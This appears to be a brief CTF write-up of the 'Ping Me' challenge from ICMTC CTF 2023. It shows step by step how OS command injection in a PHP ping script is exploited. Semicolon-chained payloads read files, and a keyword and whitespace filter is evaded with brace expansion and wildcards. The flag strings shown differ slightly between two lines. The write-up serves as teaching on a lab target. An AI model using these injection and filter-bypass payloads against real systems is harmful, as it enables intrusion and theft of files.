ICMTC CTF 2023 — International Competition of the Military Technical College

0xM4r5h4l
1 min readJun 13, 2024

--

Ping Me — OS Command Injection

The PHP script utilizes bash to ping hosts.
At first glance, it appears to be vulnerable to OS Command Injection.

  1. Testing a Simple Command Injection
    Injected command: 127.0.0.1;ls
    Server response: index.php
    Result: Command injection successful, confirming the vulnerability.

2. Attempting to Read the File /flag
Injected command: 127.0.0.1;cat /flag
Server response: Flag is forbidden to read!
Result: Access to the flag is restricted.

3. Detection of Forbidden Words
After multiple tests, it was observed that any input containing the word ‘flag’ triggered the server to respond with: Flag is forbidden to read!
The characters &, $, \, and whitespace were detected as a hack.

4. Evading Detection
To bypass detection, the injection was modified as follows: 127.0.0.1;{cat,/f*l*a*g}
Note: 127.0.0.1;{cat,/f*l*a*g} and 127.0.0.1;{cat,/flag} are equivalent.

5. Executing the File
Executed command: 127.0.0.1;/f*l*a*g
Server response: Congratulations, this is the flag location: /tmp/flag_FXLNYL.txt
Result: Successfully located the flag file.

6. Reading the Flag
Injected command: 127.0.0.1;{cat,/tmp/f*l*a*g_FXLNYL.txt}
Server response: EGCERT{3x3cut3_703503_c0Mm@nD$W!th0ut$p@c3s}
Flag obtained: EGCERT{3x3cut3_703503_c0Mm@nD$_W!th0ut_$p@c3s}

--

--